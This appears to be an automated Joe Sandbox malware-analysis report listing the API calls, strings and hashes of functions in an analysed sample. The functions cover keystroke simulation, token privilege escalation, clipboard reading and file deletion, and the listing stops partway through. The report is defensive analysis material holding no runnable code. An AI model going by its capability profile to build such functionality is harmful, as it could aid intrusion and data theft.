                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                  • Opcode ID: e0636c45c19a68885a10a2825bfebb3b9be994c3f88371d92dce20f070f6c378
                                                                                                                  • Instruction ID: c924e7fddc1f9b0ad134f9365be44336fe93244169f967d0c69b1884d13f23cd
                                                                                                                  • Opcode Fuzzy Hash: e0636c45c19a68885a10a2825bfebb3b9be994c3f88371d92dce20f070f6c378
                                                                                                                  • Instruction Fuzzy Hash: A212C171A00208AFEB249F65EC49FAF7BB8EF45324F144129F916EB2D1DB709945CB21
                                                                                                                  Function 00DFEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 00DFEB4A
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E53AEA
                                                                                                                  • IsIconic.USER32(000000FF), ref: 00E53AF3
                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00E53B00
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00E53B0A
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E53B20
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E53B27
                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00E53B33
                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E53B44
                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E53B4C
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E53B54
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00E53B57
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B6C
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00E53B77
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B81
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00E53B86
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B8F
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00E53B94
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B9E
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00E53BA3
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00E53BA6
                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00E53BCD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                  • Opcode ID: b11088f9f326b595e83a278933f8ea1cc14e1b7560e40464106a19408eccb4fa
                                                                                                                  • Instruction ID: 6a6a358e0ab7c83aa1d15473f8f10e1d6776be27d6d12a7f8672cc28b8aae5af
                                                                                                                  • Opcode Fuzzy Hash: b11088f9f326b595e83a278933f8ea1cc14e1b7560e40464106a19408eccb4fa
                                                                                                                  • Instruction Fuzzy Hash: BF31A1B1B44218BFEB212B769C49F7F3E6CEB44B94F104416FA05FA1D0D6F09D04AAA0
                                                                                                                  Function 00E1ACC5 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 223COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E1B180
                                                                                                                    • Part of subcall function 00E1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E1B1AD
                                                                                                                    • Part of subcall function 00E1B134: GetLastError.KERNEL32 ref: 00E1B1BA
                                                                                                                  • _memset.LIBCMT ref: 00E1AD08
                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E1AD5A
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00E1AD6B
                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E1AD82
                                                                                                                  • GetProcessWindowStation.USER32 ref: 00E1AD9B
                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00E1ADA5
                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E1ADBF
                                                                                                                    • Part of subcall function 00E1AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E1ACC0), ref: 00E1AB99
                                                                                                                    • Part of subcall function 00E1AB84: CloseHandle.KERNEL32(?,?,00E1ACC0), ref: 00E1ABAB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                  • String ID: $H*$default$winsta0
                                                                                                                  • API String ID: 2063423040-3938961404
                                                                                                                  • Opcode ID: 5ef90f3085b33b35ac2c66311699da568f01030370af31a58eceba15404d6f79
                                                                                                                  • Instruction ID: 4210358a7e92633c0dbf031035840b4ba27ff4494d10d1c52b77874728361353
                                                                                                                  • Opcode Fuzzy Hash: 5ef90f3085b33b35ac2c66311699da568f01030370af31a58eceba15404d6f79
                                                                                                                  • Instruction Fuzzy Hash: E981BCB1901209AFDF119FA4DC48AFEBBB9FF08348F085129F814B2161D7718E95DB62
                                                                                                                  Function 00E260DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E25FA6,?), ref: 00E26ED8
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E25FA6,?), ref: 00E26EF1
                                                                                                                    • Part of subcall function 00E2725E: __wsplitpath.LIBCMT ref: 00E2727B
                                                                                                                    • Part of subcall function 00E2725E: __wsplitpath.LIBCMT ref: 00E2728E
                                                                                                                    • Part of subcall function 00E272CB: GetFileAttributesW.KERNEL32(?,00E26019), ref: 00E272CC
                                                                                                                  • _wcscat.LIBCMT ref: 00E26149
                                                                                                                  • _wcscat.LIBCMT ref: 00E26167
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2618E
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E261A4
                                                                                                                  • _wcscpy.LIBCMT ref: 00E26209
                                                                                                                  • _wcscat.LIBCMT ref: 00E2621C
                                                                                                                  • _wcscat.LIBCMT ref: 00E2622F
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00E2625D
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00E2626E
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00E26289
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00E26298
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00E262AD
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00E262BE
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E262E1
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E262FD
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E2630B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 1917200108-1173974218
                                                                                                                  • Opcode ID: 9592800f4f1798828c6470e96c4898a6f2492184242cb2879b6bbe6c62dbd166
                                                                                                                  • Instruction ID: 9c884307f26f653b062760a7918876e6430011f61eac1852253e186e27510454
                                                                                                                  • Opcode Fuzzy Hash: 9592800f4f1798828c6470e96c4898a6f2492184242cb2879b6bbe6c62dbd166
                                                                                                                  • Instruction Fuzzy Hash: 40514172D0812CAACB21EB91DC44EEB77FCAF05304F0511E6E585F2151DE7697898FA4
                                                                                                                  Function 00E36B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32(00E7DC00), ref: 00E36B36
                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E36B44
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00E36B4C
                                                                                                                  • CloseClipboard.USER32 ref: 00E36B58
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00E36B74
                                                                                                                  • CloseClipboard.USER32 ref: 00E36B7E
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E36B93
                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00E36BA0
                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00E36BA8
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00E36BB5
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E36BE9
                                                                                                                  • CloseClipboard.USER32 ref: 00E36CF6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3222323430-0
                                                                                                                  • Opcode ID: fae2c0e33a81bf182ea1b05e7a44e08f1d9736c54ba16056a12c24511f2367ee
                                                                                                                  • Instruction ID: 66f361825e9913b56c0adcc86d8e8c43fade55a2027b59f79a951de4a2de636b
                                                                                                                  • Opcode Fuzzy Hash: fae2c0e33a81bf182ea1b05e7a44e08f1d9736c54ba16056a12c24511f2367ee
                                                                                                                  • Instruction Fuzzy Hash: A8518F312042016FD311AB66ED5AF6FBBA8EF84B54F405029F656F61A1DFA0D809CB62
                                                                                                                  Function 00E2F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E2F62B
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E2F67F
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E2F6A4
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E2F6BB
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E2F6E2
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F72E
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F767
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F7BB
                                                                                                                    • Part of subcall function 00E0172B: __woutput_l.LIBCMT ref: 00E01784
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F809
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F858
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F8A7
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F8F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                  • API String ID: 835046349-2428617273
                                                                                                                  • Opcode ID: e2dc5ee7d0d7c15f324c8f06610db84dc965b69cd2792bea6cb57fbc046ca4d7
                                                                                                                  • Instruction ID: c1d76d028db58b532f6d5d73c6a7e956f21a29946b9f16a085b29696244b06ff
                                                                                                                  • Opcode Fuzzy Hash: e2dc5ee7d0d7c15f324c8f06610db84dc965b69cd2792bea6cb57fbc046ca4d7
                                                                                                                  • Instruction Fuzzy Hash: B9A13CB2408344ABC310EBA5CC85DBFB7ECEF98704F44582AF68592191EB70D949CB72
                                                                                                                  Function 00E31B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E31B50
                                                                                                                  • _wcscmp.LIBCMT ref: 00E31B65
                                                                                                                  • _wcscmp.LIBCMT ref: 00E31B7C
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00E31B8E
                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00E31BA8
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00E31BC0
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E31BCB
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00E31BE7
                                                                                                                  • _wcscmp.LIBCMT ref: 00E31C0E
                                                                                                                  • _wcscmp.LIBCMT ref: 00E31C25
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E31C37
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00E939FC), ref: 00E31C55
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E31C5F
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E31C6C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E31C7C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                  • Opcode ID: 3a22b29a3252f6adaec837d696c94cf2c96a8f8b038a414fbf1f72cde025e60f
                                                                                                                  • Instruction ID: 19b7748981533e90567245b3dbe22c3cb7efdc2def9c119aed3ffac402da3745
                                                                                                                  • Opcode Fuzzy Hash: 3a22b29a3252f6adaec837d696c94cf2c96a8f8b038a414fbf1f72cde025e60f
                                                                                                                  • Instruction Fuzzy Hash: 7D31C531A05219AECF149BB1EC4DBDEBBECAF45354F106199E811F3090EBB0DA85CA64
                                                                                                                  Function 00E4F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00E4F37A
                                                                                                                    • Part of subcall function 00E4D7DE: ClientToScreen.USER32(?,?), ref: 00E4D807
                                                                                                                    • Part of subcall function 00E4D7DE: GetWindowRect.USER32(?,?), ref: 00E4D87D
                                                                                                                    • Part of subcall function 00E4D7DE: PtInRect.USER32(?,?,00E4ED5A), ref: 00E4D88D
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4F3E3
                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E4F3EE
                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E4F411
                                                                                                                  • _wcscat.LIBCMT ref: 00E4F441
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E4F458
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4F471
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00E4F488
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00E4F4AA
                                                                                                                  • DragFinish.SHELL32(?), ref: 00E4F4B1
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00E4F59C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                  • Opcode ID: 6a99a73d53a8badc4fb69bbe2a71173fa5573d14a7a8e86d4fa13731b50e1774
                                                                                                                  • Instruction ID: fcc2a0da74f5f8c36b63b33fb947534f0071e2a5bb4377a6f3dc90bf294796eb
                                                                                                                  • Opcode Fuzzy Hash: 6a99a73d53a8badc4fb69bbe2a71173fa5573d14a7a8e86d4fa13731b50e1774
                                                                                                                  • Instruction Fuzzy Hash: DB616B71508304AFC711EF65DC85EAFBBF8EF89750F400A1EF595A21A1DB709A09CB62
                                                                                                                  Function 00E3091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00E309DF
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E309EF
                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E309FB
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E30A59
                                                                                                                  • _wcscat.LIBCMT ref: 00E30A71
                                                                                                                  • _wcscat.LIBCMT ref: 00E30A83
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E30A98
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E30AAC
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E30ADE
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E30AFF
                                                                                                                  • _wcscpy.LIBCMT ref: 00E30B0B
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E30B4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                  • Opcode ID: 00bc25135906f0cc92defdb24ffdeb924804c195159c61c8a2125e17898c8963
                                                                                                                  • Instruction ID: a29a05a26f3fca0d6d511fc00f83b4194aaec6bad2490c8eac5f3bb4b26784e8
                                                                                                                  • Opcode Fuzzy Hash: 00bc25135906f0cc92defdb24ffdeb924804c195159c61c8a2125e17898c8963
                                                                                                                  • Instruction Fuzzy Hash: EA6179725083059FD710EF61C854AAEB7E8FF89314F04891EF989E7251DB31E945CBA2
                                                                                                                  Function 00E4EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E4EF3B
                                                                                                                  • GetFocus.USER32 ref: 00E4EF4B
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00E4EF56
                                                                                                                  • _memset.LIBCMT ref: 00E4F081
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00E4F0AC
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00E4F0CC
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00E4F0DF
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00E4F113
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00E4F15B
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E4F193
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00E4F1C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
